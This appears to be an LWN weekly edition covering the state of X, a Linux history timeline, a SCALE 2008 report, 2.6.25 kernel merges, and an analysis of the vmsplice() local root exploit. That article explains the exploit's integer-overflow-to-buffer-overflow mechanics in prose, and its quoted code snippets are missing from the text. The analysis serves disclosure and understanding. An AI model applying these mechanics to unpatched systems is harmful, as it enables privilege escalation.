event when dealing with contended locks.  The x86 maintainers clearly
thought that the benefits of eliminating the unseemly scramble for
spinlocks exceeded this small cost; it seems unlikely that others will disagree.

		LCA: Two talks on the state of X


The X window system is the kernel of the desktop Linux experience; if X
does not work well, nothing built on top of it will work well either.  Despite
its crucial role, X suffered from relative neglect for a number of years
before being revitalized by the X.org project.  Two talks at linux.conf.au
covered the current state of the X window system and where we can expect
things to go in the near future.


Keith Packard is a fixture at Linux-related events, so it was no surprise
to see him turn up at LCA.  His talk covered X at a relatively high,
feature-oriented level.  There is a lot going on with X, to say the least. 
Keith started, though, with the announcement that Intel had released
complete documentation for some of its video chips - a welcome move, beyond
any doubt.


There are a lot of things that X.org is shooting for in the near future.
The desktop should be fully composited, allowing software layers to provide
all sorts of interesting effects.  There should be no tearing (the
briefly inconsistent windows which result from partial updates).  We need
integrated 2D and 3D graphics - a goal which is complicated by the fact
that the 2D and 3D APIs do not talk to each other.  A flicker-free boot
(where the X server starts early and never restarts) is on most


distributors' wishlist.  Other desired features include fast and secure
user switching, "hotplug everywhere," reduced power consumption, and a
reduction in the (massive) amount of code which runs with root privileges.


So where do things stand now?  2D graphics and textured video work well.
Overlaid video (where video data is sent directly to the frame 
buffer - a performance technique used by some video playback applications)
does not work with compositing, though.  3D graphics does not always work
that well either; Keith put up the classic example of glxgears running
while the window manager is doing the "desktops on a cube" routine - the 3D
application runs outside of the normal composite mechanism and so cannot be
rotated with all the other windows.


On the tearing front, only 3D graphics supports no-tearing operations now.
Avoiding tearing is really just a matter of waiting for the video retrace
before making changes, but the 2D API lacks support for that.


The integration of APIs is an area requiring some work still.  One problem
is that Xv (video) output cannot be drawn offscreen - again, a problem for
compositing.  Some applications still use overlays, which really just have
no place on the contemporary desktop.  It is impossible to do 3D graphics
to or from pixmaps, which defeats any attempt to pass graphical data
between the 2D and 3D APIs.  On the other side, 2D operations do not
support textures.


Fast user switching can involve switching between virtual terminals, which
is "painful."  Only one user session can be running 3D graphics at a time,
which is a big limitation.  On the hotplug front, there are some
limitations on how the framebuffer is handled.  In particular, the X server
cannot resize the framebuffer, and it can only associate one framebuffer
with the graphics processor.  Some GPUs have maximum line widths, so the
one-framebuffer issue limits the maximum size of the internal desktop.


With regard to power usage: Keith noted that using framebuffer compression
in the Intel driver saves 1/2 watt of power.  But there are a number of
things to be fixed yet.  2D graphics busy-waits on the GPU, meaning that a
graphics-intensive program can peg the system's CPU, even though the GPU is
doing all of the real work.  But the GPU could be doing more as well; for
example, video playback does most of the decoding, rescaling, and color
conversion in the CPU.  But contemporary graphics processors can do all of
that work - they can, for example, take the bit stream directly from a DVD
and display it.  The GPU requires less power than the CPU, so shifting that
work over would be good for power consumption as well as system
responsiveness.


Having summarized the state of the art, Keith turned his attention to the
future.  There is quite a bit of work being done in a number of areas - and
not being done in others - which leads toward a better X for everybody.  On
the 3D compositing front, what's needed is to eliminate the "shared back
buffers" used for 3D rendering so that the rendered output can be handled
like any other graphical data.

Eliminating tearing requires providing the ability to synchronize with the
vertical retrace operation in the graphics card.  The core mechanism to do
this is already there in the form of the X Sync extension.  But, says
Keith, nobody is working on bringing all of this together at the moment.
Getting rid of boot-time flickering, instead, is a matter of getting the X
server properly set up sufficiently early in the process.  That's mostly a
distributor's job.


To further integrate APIs, one thing which must be done is to get rid of
overlays and to allow all graphical operations (including Xv operations) to
draw into pixmaps.  There is a need for some 3D extensions to create a
channel between GLX and pixmaps.


Supporting fast user switching means adding the ability to work with
multiple DRM master.  Framebuffer resizing, instead, means moving
completely over to the EXA acceleration architecture and finishing the
transition to the TTM memory
manager.  In the process, it may become necessary to break all existing
DRI applications, unfortunately.  And multiple framebuffer support is the
objective of a project called "shatter," which will allow screens to be
split across framebuffers.


Improving the power consumption means getting rid of the busy-waiting with
2D graphics (Keith say the answer is simple: "block").  The XvMC protocol
should be extended beyond MPEG; in particular, it needs work to be able to
properly support HDTV.  All of this stuff is currently happening.


Finally, on the security issue, Keith noted the ongoing work to move
graphical mode setting into the kernel.  That will eliminate the need for
the server to directly access the hardware - at least, when DRM-based 2D
graphics are being done.  In that case, it will become possible to run the
X server as "nobody," eliminating all privilege.  There are few people who
would argue against the idea of taking root privileges away from a massive
program like the X server.


In a separate talk, Dave Airlie covered the state of Linux graphics at a
lower level - support for graphics adapters.  He, too, talked about moving
graphical mode setting into the kernel, bringing an end to a longstanding
"legacy issue" and turning the X server into just a rendering system.  That
will reduce security problems and help with other nagging issues (graphical
boot, suspend and resume) as well.


Mode setting is the biggest area of work at the moment.  Beyond that, the
graphics developers are working on getting TTM into the kernel; this will
give them a much better handle on what is happening with graphics memory.
Then, graphics drivers are slowly being reworked around the Gallium3D
architecture.  This will improve and simplify these drivers significantly, but "it's
going to be a while" before this work is ready.  The upcoming DRI2 work will improve buffering and
fix the "glxgears on a cube" problem.


Moving on to graphics adapters: AMD/ATI has, of course, begun the process
of releasing documentation for its hardware.  This happened in an
interesting way, though: AMD went to SUSE in order to get a driver
developed ahead of the documentation release; the result was the "radeonhd"
driver.  Meanwhile, the Avivo project, which had been reverse-engineering
ATI cards, had made significant progress toward a working driver.  Dave
took that work and the AMD documentation to create the
improved "radeon" driver.  So now there are two competing projects writing
drivers for ATI adapters.  Dave noted that code is moving in both
directions, though, so it is not a complete duplication of work.  (As an
aside, from what your editor has heard, most observers expect the radeon
driver to win out in the end).


The ATI R500 architecture is a logical addition to the earlier (supported)
chipsets, so R500 support will come relatively quickly.  R600, instead, is
a totally new processor, so R600 owners will be "in for a wait" before a
working driver is available.


Intel has, says Dave, implemented the "perfect solution": it develops free
drivers for its own hardware.  These drivers are generally well done and
well documented.  Intel is "doing it right."


NVIDIA, of course, is not doing it right.  The Nouveau driver is coming
along, now, with 5-6 developers working on it.  Dave had an RandR
implementation in a state of half-completion for some time; he finally
decided that he would not be able to push it forward and merged it into the
mainline repository.  Since then, others have run with it and RandR support
is moving forward quickly.  It was, he says, a classic example of why it is
good to get the code out there early, whether or not it is "ready."
Performance is starting to get good, to the point that NVIDIA suddenly
added some new acceleration improvements to its binary-only driver.
Dave is still hoping that NVIDIA might yet release some documents - if it
happens by next year, he says, he'll stand in front of the room and dance a
jig.

		Ten-year timeline part 5: Not just SCO


Part 4 of this retrospective
ended in October, 2002, when LWN adopted its current subscription model.
That change brought a certain amount of stability for LWN (too much, we
might argue), but, in the wider Linux world, things continued to happen.
This installment picks up where the last left off.

During this period, the business of Linux was relatively quiet - not that
many acquisitions, but not many failures either.  But quite a bit was
happening around legal issues, copyright enforcement, and more...


 October 10, 2002:
     BitKeeper flames return as the non-compete clause in its license comes
     to light.  
     The sendmail source distribution is trojaned.


BitKeeper flames were a more-or-less constant feature in those days, but BitKeeper
became an established part of the kernel development process anyway.
In the October 10, 2002 edition, your editor wrote: "If Larry
McVoy (or his board of directors) wakes up hung over one morning and
decides to end free access to BitKeeper, the show is over."   That
was, unfortunately, an example of your editor's crystal ball working rather
better than usual.

The trojaning of sendmail was the first of a few such incidents.  It looked
like a scary trend for a while, but, in fact, the frequency of this kind of
attack has dropped quite a bit in the intervening years.


 October 31, 2002: the
     first cryptographic code is finally merged into the Linux kernel.  The
     first Reiser4 snapshot is posted.

 December 19, 2002: The
     Creative Commons project is launched.  ElcomSoft (Dmitry Sklyarov's
     employer) is acquitted of DMCA violation charges.  Kernel developers
     start to complain that the 2.5 feature freeze is thawing.

 January 16, 2003: The
     U.S. Supreme Court decides in favor of unlimited copyright term
     extensions.  MandrakeSoft enters bankruptcy.  The SCO Group starts
     making noises about its "Unix IP."

 January 30, 2003: SCO
     forms SCOSource and makes rather more dire noises about Linux.


By this point, there was a certain amount of discomfort over the direction
SCO was taking.  But nobody had any clue of just how weird it would
actually get.


 February 6, 2003: The
     MS-SQL worm infects the net - in about 15 minutes.  LWN begins its porting drivers to 2.6
     series. 


Remember the days of disruptive worms?  MS-SQL was one of the scariest, in
that it did most of its propagation in just a few minutes.  We don't see to
many worms like that anymore; contemporary crackers prefer to turn systems
into zombies and rent them out.


 March 13, 2003: The SCO
     Group files a $1 billion lawsuit against IBM.


And so it began, with SCO telling the world that the Linux community could
not possibly have achieved what it did unless the work had been stolen by
IBM.

For the remainder of this retrospective, your editor will attempt to keep
the number of SCO-related entries to a minimum.  It has been quite an
experience to go back and reread all of those
McBride/Enderle/Boies/DiDio/Lyons/etc. quotes, and it is tempting to put
them all here.  But that temptation will be resisted; those who want to
relive that bit of bizarre history in more detail can read the LWN pages
directly or dig through the considerable resources at Groklaw.

SCO is about as scary as Y2K now, but, in 2003, the SCO suit was a
frightening event.  To many of us it seemed possible that, maybe, one out
of thousands of developers might have slipped something improper into the
kernel code base.  And, in any case, we were under attack by a company with
millions of dollars to burn and a loud-mouthed CEO.  The whole thing cost
us a lot of time and anxiety - and, for those most directly involved -
money. 

Nonetheless, your editor will reiterate his claim that, overall, the SCO
attack has been good for us.  We needed to improve our legal defenses; as
Linux grew, there could be no doubt that people would attempt to use the
legal system to grab a piece of the pie.  In SCO we had an arrogant assailant
with no substance; we were attacked by a clown.  We got the ability to
straighten up our processes, arrange better legal help, and prove that our
code is clean without the inconvenience of facing a complaint with a bit of
legitimacy.  The community is now close to immune from copyright-based
attack, and is much better poised to deal with similar attackers (patent
trolls, for example) who could still do us some serious damage.


 March 27, 2003: Keith
     Packard is kicked out of the XFree86 core team.  Red Hat Linux 9
     - the last Red Hat Linux release - is announced.

 May 15, 2003: SCO
     suspends Linux sales and sends a warning letter to 1500 Linux users.

 May 22, 2003: The GNU and
     Ghostscript projects part ways.  Microsoft buys a $10 million
     Unix license from SCO.

 May 29, 2003: Novell
     claims that it, not SCO, owns Unix.  Kernel developers get upset about
     the fact that there has been no 2.4 kernel release for six months.
     The 2.5 kernel gets a reworked char device layer, IDE tagged command
     queueing support and the USB gadget subsystem - seven months into the 2.5
     feature freeze.  The city of Munich decides to move to Linux.


Novell's claim was clearly significant at the time, though it fell below
the radar again for several months.  In the end, of course, this was the
factor which killed SCO.  That is convenient, but almost unfortunate too:
there would have been value in seeing the substance of SCO's claims
demolished in court.

In these days of fast releases, it is interesting to consider that, for the
first half of 2003, there were no stable kernel releases at all.


 June 19, 2003: Linus
     Torvalds moves to OSDL.  The kernel gets a massively reworked ext3
     filesystem - eight months into the feature freeze.  SCO raises its
     claim for damages to $3 billion and "terminates" IBM's AIX
     license.  Software patents return to the European Parliament.

 July 10, 2003: Andrew
     Morton moves to OSDL.


OSDL was often controversial in the Linux community, but nobody doubted
that providing a home for developers like Linus and Andrew was a good
thing.  Until now, neither had held a job where working on Linux was their
primary duty.

Meanwhile, few suspected how big the software patent battle in Europe would
become - or that the anti-patent side would emerge victorious (for now).


 July 17, 2003: The
     2.6.0-test1 kernel is released; it includes the new anticipatory disk
     I/O scheduler.  Slackware celebrates its 10th anniversary.  The
     Mozilla Foundation is created.

 July 24, 2003: Red Hat
     gets out of the boxed distribution business.  Mozilla starts
     requesting donations from users.


Selling Linux in boxes was how Red Hat got going, so the end of that
business was a clear sign that things had changed.  The separation of
Mozilla and AOL (which had bought Netscape) was a little scary at the time;
it seemed that the project could fade away before the Mozilla browser became
truly ready and that it was an Internet Explorer future for all of us.
Things were a little lean at Mozilla for a while.  Now that Mozilla is
bringing in tens of millions of dollars every year, the idea that it once
sought donations is amusing.


 August 7, 2003: Novell
     acquires Ximian.  Red Hat files suit against SCO.  SCO offers the
     "intellectual property license for Linux."  SELinux is merged for the
     2.6.0-test3 kernel.

 August 21, 2003: SCO
     shows some "copied code."


SCO, remember, "encrypted" its slides of "copied" code by switching them to
a Greek font - a scheme which the community, somehow, managed to overcome.
The code in question was straight from ancient Unix; it had been
contributed by SGI, and had already been removed by the time it was
revealed.  After this, nobody worried that SCO might come up with the
"millions of lines" of code that, it said, it could prove it owned.


 September 25, 2003: The
     Fedora project launches.  Software patents pass in the European
     Parliament.  Sun's Jonathan Schwartz says "We do not believe
     that Linux plays a role on the server. Period." 

 October 16, 2003: Under
     pressure from the FSF and others, LinkSys releases source for its
     WRT54G routers.


Fedora started with all kinds of talk about what a community-oriented
project it would be.  The reality was rather slower in coming, but is
beginning to be visible now.  Meanwhile, Fedora was a useful (and used)
distribution from the outset.

The LinkSys settlement was the result of a long battle.  It was an important
early GPL enforcement action which led to the creation of a number of
distributions created for the sole purpose of doing interesting things on
LinkSys routers.  The ironic result is that LinkSys almost certainly sold
quite a few more units than it would have if it had continued to hold on to
the code.


 October 23, 2003: SCO
     gets $50 million from BayStar.

 November 6, 2003: Novell
     acquires SUSE.  A fight erupts over the "Linux Gazette" name.

 December 24, 2003: SCO
     claims ownership of the Unix ABI.  The 2.6.0 kernel is released.  Red
     Hat acquires Sistina.  The Mozilla Foundation asks for more
     donations.  


2.6.0 took almost exactly three years after 2.4.0 came out.  For the few
developers who had observed the 2.4 feature freezes, their code - which
could be four years old at this point - was only now making it into an
official mainline release.  It was not yet understood at this point, but,
once 2.6.0 came out, the "new kernel development model" started to take
shape.  Never again would we go years between major stable releases.


 January 22, 2004: SCO
     files its "slander of title" suit against Novell.  Linus gets dunked. 

 January 29, 2004:
     UnitedLinux dies a quiet death.  SCO sends a letter to the
     U.S. Congress.  Version 2 of the Apache License is adopted.

 February 5, 2004: XFree86
     leader David Dawes changes the project's license.


There had been trouble in XFree86 for a long time, but the license change
brought it all to a head.  This was the move which killed XFree86, led to
the creation of the revitalized X.org, and, eventually, brought life back
to X development.


 February 12, 2004: The
     Grumpy Editor makes his debut.


The first Grumpy Editor
article was never intended to be the beginning of a series; your editor
was simply grumpy that the Galeon browser had gone the route of many early
GNOME 2.x applications: less configurability, fewer features, and worse
performance.  The persona proved popular with readers, though, and the
Grumpy Editor has been making irregular appearances on LWN ever since.


 February 19, 2004: The
     Netfilter team settles its first GPL enforcement action in Europe.

 February 26, 2004: X11
     development moves to the freedesktop.org project.  MandrakeSoft is
     ordered by a French court to stop using the "Mandrake" name.

 March 4, 2004: SCO sues
     AutoZone and DaimlerChrysler.  EV1Servers.Net buys an expensive SCO
     license - a move they certainly still regret.  FreeS/WAN shuts down. 


The attack on Linux users had been long foreshadowed - and feared.
Regardless of the validity of its claims, SCO could certainly make life
hard for Linux by attacking those who use it.  The attacks were so
laughable, though, that they had no appreciable effect, even in the short
term. 


 March 11, 2004: The
     Anderer memo surfaces, tying SCO to Microsoft.  The tenth anniversary
     of the green card spam.

 March 18, 2004: Open
     Source Risk Management launches.  MandrakeSoft files its plan to exit
     bankruptcy. 


For those who don't remember, OSRM was a scheme to sell insurance against
legal attacks to users of free software.  But, by this point, nobody was
all that worried about SCO, and OSRM never did take off.  On the other
hand, MandrakeSoft did succeed in getting out of bankruptcy and is still
with us.


 March 25, 2004: BitMover
     claims that the pace of kernel development has doubled as a result of
     the adoption of BitKeeper.


This installment started with BitKeeper, and will end there.  For all the
complaints about BitKeeper and its associated "don't piss off Larry"
license, few could contest the claim that kernel development was proceeding
at a much faster pace.  We needed a tool like that.  To this day, it
remains discouraging that we were not able to develop a distributed
revision control system for ourselves until Larry McVoy and BitMover showed
the way.  If there was ever an itch in need of scratching, this was it.

The next installment (which will most likely appear two weeks from now)
will start with April, 2004 and come fairly close to the present.  Stay
tuned.

		vmsplice(): the making of a local root exploit


As this is being written, distributors are working quickly to ship kernel
updates fixing the local root vulnerabilities in the vmsplice()
system call.  Unlike a number of other recent vulnerabilities which have
required special situations (such as the presence of specific hardware) to
exploit, these vulnerabilities are trivially exploited and the code to do
so is circulating on the net.  Your editor found himself wondering how such
a wide hole could find its way into the core kernel code, so he set himself
the task of figuring out just what was going on - a task which took rather
longer than he had expected.


The splice() system call, remember, is a mechanism for creating
data flow plumbing within the kernel.  It can be used to join two file
descriptors; the kernel will then read data from one of those descriptors
and write it to the other in the most efficient way possible.  So one can
write a trivial file copy program which opens the source and destination
files, then splices the two together.  The vmsplice() variant
connects a file descriptor (which must be a pipe) to a region of user
memory; it is in this system call that the problems came to be.


The first step in understanding this vulnerability is that, in fact, it is
three separate bugs.  When the word of this problem first came out, it was
thought to only affect 2.6.23 and 2.6.24 kernels.  Changes to the
vmsplice() code had caused the omission of a couple of important
permissions checks.  In particular, if the application had requested that
vmsplice() move the contents of a pipe into a range of memory, the
kernel didn't check whether that application had the right to write to that
memory.  So the exploit could simply write a code snippet of its choice
into a pipe, then ask the kernel to copy it into a piece of kernel memory.
Think of it as a quick-and-easy rootkit installation mechanism.


If the application is, instead, splicing a memory range into a pipe, the
kernel must, first, read in one or more iovec structures
describing that memory range.  The 2.6.23 vmsplice() changes omitted
a check on whether the purported iovec structures were in readable
memory.  This looks more like an information disclosure vulnerability than
anything else - though, as we will see, it can be hard to tell sometimes.


These two vulnerabilities (CVE-2008-0009 and CVE-2008-0010) were patched in
the 2.6.23.15 and 2.6.24.1 kernel updates,
released on February 8.


On February 10, Niki Denev pointed out that
the kernel appeared to be still vulnerable after the fix.  In fact, the
vulnerability was the result of a different problem - and it is a much worse one, in
that kernels all the way back to 2.6.17 are affected.  At this point, a
large proportion of running Linux systems are vulnerable.  This one has
been fixed in the 2.6.22.18,
2.6.23.16, and 2.6.24.2 kernels, also released
on the 10th.  At this point, with luck, all of these bugs have been firmly
stomped - though, now, we need to see a lot of distributor updates.


The problem, once again, is in the memory-to-pipe implementation.  The
function get_iovec_page_array() is charged with finding a set of
struct page pointers corresponding to the array of iovec
structures passed in by the calling application.  Those pointers are stored
in this array:


Where PIPE_BUFFERS happens to be 16.  In order to avoid
overflowing this array, get_iovec_page_array() does the following
check:


Here, off is the offset into the first page of the memory to be
transferred, len is the length passed in by the application, and
buffers is the current index into the pages array.

Now, if we turn our attention to the exploit code for a
moment, we see it
setting up a number of memory areas with mmap(); some of that
setup is not necessary for the exploit to work, as it turns out.  At the
end, the code does this (edited slightly):


The map_addr address points to one of the areas created with
mmap() which, crucially, is significantly more than
PIPE_BUFFERS pages long.  And the length is passed through as the
largest possible unsigned long value.

Now let's go back to fs/splice.c, where the vmsplice()
implementation lives.  We note that, prior to the fix, the
kernel did not check whether the memory area pointed to by the
iovec structure was readable by the calling process.  Once again,
this looks like an information disclosure vulnerability - the process could
cause any bit of kernel memory to be written to the pipe, from which it
could be read.  But the exploit code is, in fact, passing in a valid
pointer - it's just the length which is clearly absurd.

Looking back at the code which calculates npages, we see
something interesting:


Since len will be ULONG_MAX when the exploit runs, the
addition will cause an integer overflow - with the effect that
npages is calculated to be zero.  Which, one would think, would
cause no pages to be examined at all.  Except that there is an unfortunate
interaction with another part of the kernel.


Once npages has been calculated, the next line of code looks like
this:


get_user_pages() is the core memory management function used to
pin a set of user-space pages into memory and locate their struct
page pointers.  While the npages variable passed as an
argument is an unsigned quantity, the prototype for
get_user_pages() declares it as a simple int called len.  And, to
complete the evil, this function processes pages in a
do {} while(); loop which ends thusly:


So, if get_user_pages() is passed with a len argument of
zero, it will pass through the mapping loop once, decrement len to a
negative number, then continue faulting in pages until it hits an address
which lacks a valid mapping.  At that point it will stop and return.  But,
by then, it may have stored far more entries into the pages array
than the caller had allocated space for.

The practical result in this case is that get_user_pages() faults
in (and stores struct page pointers for) the entire region mapped
by the exploit code.  That region (by design) has more than
PIPE_BUFFERS pages - in fact, it has three times that many, so 48
pointers get stored into a 16-pointer array.  And this turns the failure to read-verify
the source array  into a buffer overflow vulnerability
within the kernel.  Once that is in place, it is a relatively
straightforward exercise for any suitably 31337 hacker to cause the kernel
to jump into the code of his or her choice.  Game over.  (Update: as
a linux-kernel reader pointed out, the
story is a little more complicated still at this point; this is an unusual
sort of buffer overflow attack).


The fix
which was applied simply checks the address range that the 
application is trying to splice into the pipe.  Since a range of length
ULONG_MAX is unlikely to be valid, the vulnerability is closed -
as are any potential information disclosure problems.

This vulnerability is a clear example of how a seemingly read-only
vulnerability can be escalated into something rather more severe.  It also
shows what can happen when certain types of sloppiness find their way into
the code - if get_user_pages() is asked to get zero pages, that's
how many it should do.  Your editor is working on a patch to clean that up
a bit.  Meanwhile, everybody should ensure that they are running current
kernels with the vulnerability closed.

		A report from SCALE 2008


Escaping the cold for 70 degree days in Los Angeles might be a reason for
some—Colorado-based LWN Editors for example—but it clearly is
not the reason that most folks choose to attend Southern
California Linux Expo (SCALE).  Many of the approximately 1400 attendees already live in the region, so it
is the speakers, participants, and the expo floor that bring them in.  
I attended
the sixth annual
SCALE (SCALE 6x), just held, February 8-10 and it didn't take me very long to see
why it continues to grow and prosper.


SCALE is a three day event, with two main conference days on Saturday and
Sunday and a set of mini-conferences running in parallel on Friday.  Each
mini-conference covers a focused topic of interest to the community, with
this year's topics examining Women
in Open 
Source (WIOS), Open Source Software in Education (OSSIE), and Demonstrating Open Source
Healthcare Solutions (DOHCS).  It was a full day as each had eight or more
hour-long sessions.


Allison Randal kicked off the WIOS track with a
presentation aimed at encouraging more women to give presentations at
conferences.  Her talk, "The Art of Conference Presentations", was not
particularly gender specific, of course. It covered the process of proposing,
creating and giving talks to conferences.  Randall's advice was cogent,
from avoiding "cute" titles to establishing credibility via your
biography without feeling like you are bragging.  Her most important point was
to not wait around until you are the perfect speaker, but to go out and
start speaking; your voice and style will come with practice.


Over in the OSSIE track, Dan Anderson related his experiences teaching
computer science concepts to middle and high school students over the last
fourteen years.  His approach
is to use computing as a bridge between math, science, and technology.  He
discussed the process of creating, or trying to create, a stable curriculum
in the face of rapid technological change.  Because the hardware, operating
systems, and languages all change quickly, his courses need to focus on
concepts that are not specific to any of those.  Over the years he has
taught, the language used in the advanced placement course—dictated
by the state CollegeBoard company—has gone from Pascal, through C++, and now uses Java,
with some rumblings being heard about moving to Python.  As he points out,
"much of what a High School student learns about technology will be
outdated by the time they graduate from college."


He uses How to Design Programs as the
core text for his courses.  It uses a graphical
programming environment called DrScheme, which is based on Scheme,
that allows different subsets of the language to be used based on the skill
level of the student.  Anderson has integrated various peripherals, like
cameras and audio equipment, into the environment so that students can
interact with the real world in interesting ways.  His students work on
projects like voice authentication and computer vision; this year's project
is to recognize tic-tac-toe as drawn on a white board. 


Other topics from OSSIE included a tutorial introduction to
the moodle content management system (CMS) for
online learning.  Much like other CMS projects, moodle allows the creation
of websites with various kinds of content—audio,
video, images, and text—but organized as a course.  It provides a
framework and philosophy to guide the development of online classes.
Students access the content via the web, completing tasks, taking quizzes,
and participating in forums and chats with other students.

 Charles Edge (no relation) spoke about the challenges of implementing
directory services for educational institutions.  One problem is that the
term "directory services" cover a large amount of ground, from tracking
users (both employees and students) to allowing single sign-on (SSO) into
multiple machines and services throughout the school.  The biggest
challenge can be handling the sheer numbers of people to be tracked.  Open
source solutions do exist, OpenLDAP
for storing the information, Kerberos for single sign-on and Simple Authentication and Security
Layer (SASL) for extending the reach of the SSO into other services,
but it is complex to configure and administer.  For scalability and
robustness in large installations, Edge suggests Microsoft's Active
Directory, which was not a particularly popular opinion with the open
source oriented audience.  

The first day closed with a WIOS panel discussion, where
six of the women presenting or showing at the conference discussed the
issues facing women in open source.  The discussion was informal and
wide-ranging with a great deal of audience participation.  Audience members
asked questions as well as offered opinions and theories on why the
participation of women is low and what can be done to make things better.
No real conclusions were reached, as is usual for discussions of this
topic; it is one of the more puzzling attributes of the free/open source
community.  


The animated and amusing Ubuntu community manager Jono Bacon gave a
rousing keynote to start things off on Saturday.  He tried to ensure that
everyone was awake by leading a greeting in multiple languages (including
Klingon).  His main point was to describe the responsibilities of the
various "factions" that jockey to determine the future of open source
software—companies, distributions, and communities—trying to
show that each has an important role.  In fact, it is up to all
constituents to ensure that the greater Linux ecosystem thrives and that
each group works well with the others.  It was all pretty much "motherhood and
apple pie" stuff, but well described and illustrated—all with Chuck
Norris to keep track of the score.  Bacon did provide the quote of the show
when he said that free software was "started by a guy with a beard
who was pissed off at a printer."


Saturday was also the first day that the expo floor was open.  Some 80
booths were there, representing companies large and small as well as lots
of free software projects.  One of the more interesting booths contained a
working simulator of a 747 cockpit.  All of the instruments were driven
from a realtime Linux box and the FlightGear flight simulator was used
to generate the cockpit window view.  The two machines communicated over
the network and various laptops were able to view the flight from other
perspectives by getting updates from the simulator.  It was rather impressive.


 The linuxastronomy.org project
was also on hand with their telescope prototype.  The telescope will be
controlled via a Linux machine allowing it to be pointed at locations as
specified by users.  A Linux desktop application will send locations to the
telescope over the internet, allowing it to be remotely controlled so that
it can be installed in a mountaintop or other location with (relatively)
little light pollution and good viewing conditions. In addition, the
project was demonstrating many of the free astronomy programs available for
Linux.
 A mobile audio studio product, Indamixx, did not have a booth, but
could be seen all over the show.  The company loaned two of the UMPC-based
devices to the conference which were used to do podcasts of interviews with
speakers and attendees.  The device runs Linux with Audacity and ardour along with other free software.  The
company has tweaked things to make it all work well and be easy to use on
the device.  It looks to be quite capable as well as easily portable.  

In another interesting talk, David Maxwell of Coverity gave an update on their project
to scan free software for security holes.  The US Department of Homeland
Security gave Coverity a grant to work with free software projects to use
the Coverity Prevent static code analysis tool (once known
as the "Stanford Checker") on the code.  The scan project has found over 7,000
defects in around a hundred free software projects since its inception.  Maxwell
is the Open Source Strategist for Coverity; he is looking for more projects
to participate. He is encouraging any free/open source software project to
get in touch with him to get signed up for the program. 

Projects that join get their code scanned
with a report being generated on the Coverity website for project members to
view.  The projects can then fix any of the issues that are actually bugs,
mark others as "not a bug", and resubmit the code.  The Coverity system
will check the latest code out of their source code repository and check it
again.  Once all issues that the tool finds are handled, the project can
move up to a higher "rung on the scan ladder" which will allow them to be
scanned by more recent versions of the Coverity tool.


Bdale Garbee had perhaps the geekiest talk of the show on Saturday afternoon with
"Open Avionics for Model Rockets".  Garbee gave an overview of the hobby,
which has gone far beyond the Estes rockets that many of us dabbled with in
our youth.  These rockets can go to 10,000 feet and above; just how high
they go is one of the questions that led folks to start outfitting them
with instruments.  Deploying the recovery system—typically a
parachute—at apogee is very desirable and a barometric sensor with a
little bit of logic tied to the ejection charge can do just that.
Unfortunately, all of the commercially available options for these systems
are completely closed; even the protocol to talk to the
device is not released by the manufacturers.


Garbee decided to once again combine one of his hobbies with open source to
design and build an open device.  Both the hardware and software will be
released under free licenses (GPL and
Open Hardware License); he had
version 0.1 of the hardware (missing the accelerometer due to a problem in
the board layout) with him at the show.  The AltusMetrum system also has an onboard
barometric sensor and will be able to support things like GPS devices and
radio transmitters—so that lost rockets do not stay lost.  Garbee
expects to flight test the board and design version 0.2 of the hardware
over the coming months.  


Sunday's keynote, by Stormy Peters of OpenLogic was entitled "Would you do
it again for free?".  Peters looked at whether external rewards, usually
money, affect the motivation of open source developers; in particular, if
the pay stops, will the project work stop as well?  She cited four
separate "studies" (including two that weren't intended as studies) that
seemed to show that adding a reward, or penalty, can sometimes have a counter-intuitive
effect (see an entry
in her weblog for more information).


Peters came to no firm conclusions about what the long-term effects of paying
open source developers would be, but there are some mitigating factors that
seem to provide hope that developers would continue if the paychecks
stopped.  When a payment or reward is in line with expectations for doing
a particular task, it is much less demotivating.  Also, if the payment is
for working on the project, not tied to a specific goal or milestone, it is
also less of a problem.  Both of those are typically the case with folks
who are paid—40% of open source developers are, according to
Peters—for their work in the community.


After a last wander through the show floor, I was able to catch a few
minutes of the talk given by Ken Gilmer and Angel Roman of Bug Labs describing their modular embedded
Linux gadget building system.  The system consists of a core module along
with various plug-in devices: camera, motion detector, GPS, etc. that can
be combined into a single Java programmable device.  Many additional peripheral
modules are planned.  The software that runs on the device is free and Bug
Labs has a community site to share application code; they are clearly
hoping that they can foster a community of users and developers.


As can be seen, SCALE offers a wide variety of technical content in a well
organized and fun conference.  It has grown beyond the capacity of the
Airport Westin where it has been held for the last few years; expect a new,
bigger venue somewhere in LA next year.  Over the last few years, SCALE has
drawn from more areas of the southwest US in moving from a small, local
conference to a regional one.  If things continue, in another few years it
may grow into a national conference; one can only hope that if that
happens, it will continue to be as well run and interesting as it is today.


		Before the 2.6.25 merge window closed...


The 2.6.25 merge window closed on February 10, after the merging of an
eye-opening 9450 non-merge changesets.  Most of the changes merged for
2.6.25 were covered in the first and second "what got merged"
articles.  This, the third in the series, covers the final 1900 patches
merged before the window closed.


User-visible changes include:


 There are new drivers for SC2681/SC2691-based serial ports, Dallas
     DS1511 timekeeping chips, AT91sam9 realtime clock devices, Compaq
     ASIC3 multi-function chips, Cell Broadband Engine memory controllers,
     Marvell MV64x60 memory controllers, PA Semi PWRficient NAND flash
     interfaces, Marvell Orion NAND flash controllers, Freescale eLBC NAND
     flash controllers, Sharp Zaurus SL-6000x keyboards, Fujitsu Lifebook
     Application Panel buttons, IPWireless 3G UMTS PCMCIA cards,
     intelligent storage device enclosures, Winbond W83L786NG
     and W83L786NR sensor chips, Texas Instruments ADS7828
     12-bit 8-channel ADC devices, and Sony MemoryStick cards.

 Also added are updated video drivers for Radeon R500 chipsets (2D
     acceleration is now supported) and Intel i915 chipsets (suspend and
     resume now work properly).

 Several more obsolete OSS audio drivers have been removed.  The old
     mxser driver has also been removed in favor of mxser_new, now called
     simply "mxser."

 File descriptors returned by inotify_init() now support
     signal-based (using SIGIO) I/O.  There is also a new
     notification event (IN_ATTRIB) sent when the link count of a
     watched file changes.

 The mac80211 (formerly Devicescape) wireless subsystem is no longer
     marked "experimental."

 The memory use controller for containers has been merged.  This
     controller was described in this LWN article, but the
     patch has evolved somewhat since then and the details have changed.
     Some documentation can be found in Documentation/controllers/memory.txt. 

 ACPI thermal regulation support has been added; see Documentation/thermal/sysfs-api.txt for
     details on how it works.  The ACPI code also now supports the Windows
     Management Instrumentation interface, and uses that support to make
     recent Acer laptops work.

 ACPI now provides support for users who want to override their
     system's Differentiated System Description Table (DSDT).

 The XFS filesystem now supports the fallocate() system call. 

 ATA-over-Ethernet (AoE) now properly supports devices with multiple
     network interfaces (and, thus, multiple paths to the host).

 Support for the MN10300
     architecture (little-endian mode only) has been added.

 Support for a.out binaries has been removed from the ELF loader.  Pure
     a.out systems will still work, though.

